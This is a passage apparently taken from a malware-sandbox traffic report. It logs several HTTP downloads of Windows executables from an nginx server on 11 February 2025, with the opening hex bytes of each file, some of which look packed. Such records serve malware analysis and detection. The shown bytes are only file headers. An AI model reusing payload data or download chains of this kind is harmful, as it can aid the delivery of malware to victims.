00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 72 00 00 00 10 00 00 00 74 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6e 2b 00 00 00 90 00 00 00 2c 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 2b 07 00 00 c0 00 00 00 02 00 
00 00 a4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 10 08 00 00 f0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 6a ed 00 00 00 00 10 00 00 ee 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d6 0f 00 00 00 f0 10 00 00 10 00 00 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 08:20:27 GMTContent-Type: application/octet-streamContent-Length: 10302976Last-Modified: Fri, 24 Jan 2025 18:07:34 GMTConnection: keep-aliveETag: "6793d6e6-9d3600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 04 00 00 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 00 00 00 00 00 16 9d 00 00 00 00 00 e0 00 02 03 0b 01 03 00 00 24 49 00 00 bc 04 00 00 00 00 00 d0 61 06 00 00 10 00 00 00 f0 94 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 80 a0 00 00 04 00 00 f7 da 9d 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 90 9c 00 dc 03 00 00 00 60 a0 00 97 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 9c 00 6a a0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 fa 94 00 a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 65 22 49 00 00 10 00 00 00 24 49 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 70 a8 4b 00 00 40 49 00 00 aa 4b 00 00 28 49 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 08 93 07 00 00 f0 94 00 00 9e 04 00 00 d2 94 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 dc 03 00 00 00 90 9c 00 00 04 00 00 00 70 99 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 6a a0 03 00 00 a0 9c 00 00 a2 
03 00 00 74 99 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 73 79 6d 74 61 62 00 04 00 00 00 00 50 a0 00 00 02 00 00 00 16 9d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 42 2e 72 73 72 63 00 00 00 97 1c 00 00 00 60 a0 00 00 1e 00 00 00 18 9d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 08:20:35 GMTContent-Type: application/octet-streamContent-Length: 814592Last-Modified: Thu, 06 Feb 2025 19:25:08 GMTConnection: keep-aliveETag: "67a50c94-c6e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 76 74 9e df 00 00 00 00 00 00 00 00 e0 00 2e 01 0b 01 30 00 00 40 02 00 00 08 00 00 00 00 00 00 6e 5e 02 00 00 20 00 00 00 60 02 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 0c 00 00 06 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 20 5e 02 00 4b 00 00 00 00 60 02 00 98 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 02 00 0c 00 00 00 d4 5d 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 3e 02 00 00 20 00 00 00 40 02 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 98 05 00 00 00 60 02 00 00 06 00 00 00 46 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 02 00 00 02 00 00 00 4c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 64 61 74 61 00 00 00 10 05 00 00 a0 02 00 00 10 05 00 00 4e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 00 00 00 10 05 00 00 c0 07 00 00 10 05 
00 00 5e 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 08:20:41 GMTContent-Type: application/octet-streamContent-Length: 745472Last-Modified: Thu, 06 Feb 2025 02:47:54 GMTConnection: keep-aliveETag: "67a422da-b6000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 76 74 9e df 00 00 00 00 00 00 00 00 e0 00 2e 01 0b 01 30 00 00 2a 01 00 00 08 00 00 00 00 00 00 0e 49 01 00 00 20 00 00 00 60 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 0b 00 00 06 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c0 48 01 00 4b 00 00 00 00 60 01 00 98 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 01 00 0c 00 00 00 78 48 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 14 29 01 00 00 20 00 00 00 2a 01 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 98 05 00 00 00 60 01 00 00 06 00 00 00 30 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 01 00 00 02 00 00 00 36 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 64 61 74 61 00 00 00 14 05 00 00 a0 01 00 00 14 05 00 00 38 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 00 00 00 14 05 00 00 c0 06 00 00 14 05 
00 00 4c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 08:20:47 GMTContent-Type: application/octet-streamContent-Length: 332800Last-Modified: Fri, 07 Feb 2025 04:36:30 GMTConnection: keep-aliveETag: "67a58dce-51400"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 04 00 12 25 9e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 66 04 00 00 aa 00 00 00 00 00 00 40 b9 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d9 9b 04 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 05 00 10 39 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c 9d 04 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 10 64 04 00 00 10 00 00 00 66 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 73 20 00 00 00 80 04 00 00 22 00 00 00 6a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 f4 cf 00 00 00 b0 04 00 00 4e 00 00 00 8c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 10 39 00 00 00 80 05 00 00 3a 00 00 00 da 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 08:20:53 GMTContent-Type: application/octet-streamContent-Length: 2147840Last-Modified: Tue, 11 Feb 2025 08:18:37 GMTConnection: keep-aliveETag: "67ab07dd-20c600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1d e9 b6 df 59 88 d8 8c 59 88 d8 8c 59 88 d8 8c 33 94 da 8c 70 88 d8 8c 59 88 d9 8c 5b 88 d8 8c eb 94 c8 8c 5b 88 d8 8c 59 88 d8 8c 56 88 d8 8c e1 8e de 8c 58 88 d8 8c 52 69 63 68 59 88 d8 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 97 bb 8b 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 de 00 00 00 b6 05 00 00 00 00 00 00 b0 4a 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 e0 4a 00 00 04 00 00 ee 4f 21 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5b f0 06 00 6f 00 00 00 00 e0 06 00 48 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 d0 06 00 00 10 00 00 00 4a 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 48 04 00 00 00 e0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 f0 06 00 00 02 
00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 60 29 00 00 00 07 00 00 02 00 00 00 60 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 64 6d 78 6f 78 73 71 00 40 1a 00 00 60 30 00 00 3c 1a 00 00 62 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 73 75 62 75 6d 67 67 75 00 10 00 00 00 a0 4a 00 00 06 00 00 00 9e 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 b0 4a 00 00 22 00 00 00 a4 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 08:21:00 GMTContent-Type: application/octet-streamContent-Length: 3218752Last-Modified: Tue, 11 Feb 2025 05:41:47 GMTConnection: keep-aliveETag: "67aae31b-311d40"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 c8 f2 43 da 00 00 00 00 00 00 00 00 e0 00 2e 01 0b 01 30 00 00 f0 00 00 00 08 00 00 00 00 00 00 be 0e 01 00 00 20 00 00 00 20 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 31 00 00 04 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 70 0e 01 00 4b 00 00 00 00 20 01 00 98 05 00 00 00 00 00 00 00 00 00 00 00 d8 30 00 40 45 00 00 00 40 01 00 0c 00 00 00 21 0e 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 ee 00 00 00 20 00 00 00 f0 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 98 05 00 00 00 20 01 00 00 06 00 00 00 f4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 01 00 00 02 00 00 00 fa 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 64 61 74 61 00 00 00 dc 2f 00 00 60 01 00 00 dc 2f 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 08:21:07 GMTContent-Type: application/octet-streamContent-Length: 2074624Last-Modified: Sun, 09 Feb 2025 11:32:34 GMTConnection: keep-aliveETag: "67a89252-1fa800"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 12 25 9e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 66 04 00 00 ac 00 00 00 00 00 00 00 70 4a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 4a 00 00 04 00 00 da d7 1f 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 90 05 00 6b 00 00 00 00 80 05 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 91 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 70 05 00 00 10 00 00 00 70 05 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ac 01 00 00 00 80 05 00 00 02 00 00 00 80 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 90 05 00 00 02 00 00 00 82 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 2a 00 00 a0 05 00 00 02 00 00 00 84 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 75 66 6d 62 74 6c 78 00 00 1a 00 00 60 30 00 00 fa 19 00 00 86 05 00 00 00 
